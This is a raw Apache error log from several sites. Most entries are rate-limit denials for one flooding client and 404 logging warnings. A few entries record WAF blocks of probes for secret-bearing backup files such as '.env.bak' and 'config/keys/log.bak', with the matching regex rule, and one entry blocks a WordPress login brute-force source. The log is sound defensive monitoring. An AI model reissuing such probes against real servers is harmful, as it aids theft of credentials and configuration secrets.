[Tue May 26 19:54:42.295735 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LECQAAAKE
[Tue May 26 19:54:42.299968 2026] [qos:error] [pid 93868:tid 94334] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKkqK9k_ZUB2Vp25KwQAAAds
[Tue May 26 19:54:42.308454 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKkqK9k_ZUB2Vp25KwwAAAZQ
[Tue May 26 19:54:42.310388 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKlZMwN0DpLVWo6LEDgAAAJw
[Tue May 26 19:54:42.311044 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtKkqK9k_ZUB2Vp25KxAAAAeM
[Tue May 26 19:54:42.314179 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KmwAAAeE"]
[Tue May 26 19:54:42.315903 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDcAAAAKY"]
[Tue May 26 19:54:42.321433 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KmQAAAc0"]
[Tue May 26 19:54:42.322558 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSUQAAABs"]
[Tue May 26 19:54:42.335530 2026] [security2:error] [pid 86490:tid 86701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDdgAAANY"]
[Tue May 26 19:54:42.351923 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KmgAAAb0"]
[Tue May 26 19:54:42.356903 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDbgAAAQM"]
[Tue May 26 19:54:42.358932 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSewAAAAA"]
[Tue May 26 19:54:42.358974 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDdAAAAPA"]
[Tue May 26 19:54:42.361534 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSawAAABc"]
[Tue May 26 19:54:42.361912 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KlgAAAes"]
[Tue May 26 19:54:42.366923 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSZQAAAAs"]
[Tue May 26 19:54:42.369991 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSfAAAADc"]
[Tue May 26 19:54:42.375581 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKEqK9k_ZUB2Vp25KmAAAAfQ"]
[Tue May 26 19:54:42.381847 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKFZMwN0DpLVWo6LDgwAAAN0"]
[Tue May 26 19:54:42.388565 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KpwAAAgY"]
[Tue May 26 19:54:42.394306 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSWgAAACo"]
[Tue May 26 19:54:42.396881 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KqwAAAdw"]
[Tue May 26 19:54:42.397354 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSXgAAAFI"]
[Tue May 26 19:54:42.421470 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KpAAAAZM"]
[Tue May 26 19:54:42.429442 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKGDRMqfxdEDkoszSYQAAAGw"]
[Tue May 26 19:54:42.432108 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSgQAAAGA"]
[Tue May 26 19:54:42.443419 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDuQAAAKc"]
[Tue May 26 19:54:42.467161 2026] [security2:error] [pid 86490:tid 86676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDvAAAAL0"]
[Tue May 26 19:54:42.467607 2026] [security2:error] [pid 93576:tid 93824] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/keys/log.bak"] [unique_id "ahWtKmDRMqfxdEDkoszSogAAAHA"]
[Tue May 26 19:54:42.471190 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSggAAACU"]
[Tue May 26 19:54:42.623217 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEMQAAAN0
[Tue May 26 19:54:42.625360 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEMgAAAO8
[Tue May 26 19:54:42.625931 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEMwAAAMs
[Tue May 26 19:54:42.626123 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSrQAAABk
[Tue May 26 19:54:42.628023 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LENAAAALg
[Tue May 26 19:54:42.653900 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSrwAAAEs
[Tue May 26 19:54:42.698590 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LENQAAAJo
[Tue May 26 19:54:42.773971 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEOAAAAKk
[Tue May 26 19:54:42.774342 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSsQAAACY
[Tue May 26 19:54:42.776741 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEOgAAAJQ
[Tue May 26 19:54:42.776776 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtKkqK9k_ZUB2Vp25K6QAAAck
[Tue May 26 19:54:42.780364 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEOwAAAM4
[Tue May 26 19:54:42.803020 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszSsgAAAEA
[Tue May 26 19:54:42.805278 2026] [security2:error] [pid 93576:tid 93760] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/testing/.env.bak"] [unique_id "ahWtKmDRMqfxdEDkoszSswAAADA"]
[Tue May 26 19:54:42.853376 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEPgAAAL4
[Tue May 26 19:54:42.878151 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEPwAAAMo
[Tue May 26 19:54:42.938703 2026] [security2:error] [pid 93576:tid 93659] [remote 167.71.130.119:39220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtKmDRMqfxdEDkoszSsAAARE4"]
[Tue May 26 19:54:42.940264 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEQAAAAMk
[Tue May 26 19:54:42.962943 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEQQAAAP0
[Tue May 26 19:54:42.963650 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszStAAAAHo
[Tue May 26 19:54:42.967221 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEQwAAAOA
[Tue May 26 19:54:42.967553 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKlZMwN0DpLVWo6LEQgAAAPM
[Tue May 26 19:54:42.969979 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKkqK9k_ZUB2Vp25K7QAAAgc
[Tue May 26 19:54:42.971558 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtKmDRMqfxdEDkoszStQAAAEE
[Tue May 26 19:54:43.005896 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LERAAAAKE
[Tue May 26 19:54:43.099836 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszSuQAAABE
[Tue May 26 19:54:43.163387 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LERwAAAOg
[Tue May 26 19:54:43.166854 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LESgAAAOY
[Tue May 26 19:54:43.166859 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LESAAAANY
[Tue May 26 19:54:43.166861 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LESQAAAPU
[Tue May 26 19:54:43.167800 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:49396] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszSvAAAADo
[Tue May 26 19:54:43.168238 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LESwAAAQI
[Tue May 26 19:54:43.171006 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LETAAAAQM
[Tue May 26 19:54:43.171173 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK0qK9k_ZUB2Vp25K7gAAAf0
[Tue May 26 19:54:43.173566 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszSvQAAAD4
[Tue May 26 19:54:43.276064 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSfgAAAAE"]
[Tue May 26 19:54:43.280220 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDxQAAAOc"]
[Tue May 26 19:54:43.282548 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDyAAAALU"]
[Tue May 26 19:54:43.283863 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDwwAAAO0"]
[Tue May 26 19:54:43.290496 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDxgAAAME"]
[Tue May 26 19:54:43.290781 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25KwgAAAdc"]
[Tue May 26 19:54:43.293184 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDxwAAAKQ"]
[Tue May 26 19:54:43.300960 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSiQAAAHs"]
[Tue May 26 19:54:43.323424 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KtgAAAZI"]
[Tue May 26 19:54:43.323546 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KuAAAAas"]
[Tue May 26 19:54:43.330279 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD6QAAAKs"]
[Tue May 26 19:54:43.333608 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD5QAAAMA"]
[Tue May 26 19:54:43.339543 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKWDRMqfxdEDkoszSjQAAAFE"]
[Tue May 26 19:54:43.363715 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDzgAAALY"]
[Tue May 26 19:54:43.365025 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD5wAAAKw"]
[Tue May 26 19:54:43.378958 2026] [security2:error] [pid 86490:tid 86645] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDzwAAAJ4"]
[Tue May 26 19:54:43.383260 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEGAAAAKg"]
[Tue May 26 19:54:43.391601 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LDxAAAAKo"]
[Tue May 26 19:54:43.397817 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KuQAAAdI"]
